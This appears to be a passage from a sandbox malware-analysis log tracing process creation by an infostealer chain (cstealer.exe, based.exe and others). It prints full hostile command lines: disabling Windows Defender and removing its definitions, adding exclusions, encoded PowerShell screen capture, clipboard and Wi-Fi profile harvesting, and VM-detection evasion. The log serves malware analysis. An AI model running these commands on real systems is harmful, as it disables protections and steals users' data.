JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Source: C:\ProgramData\svchost.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7796"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quietJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quietJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogymJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogymJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quietJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
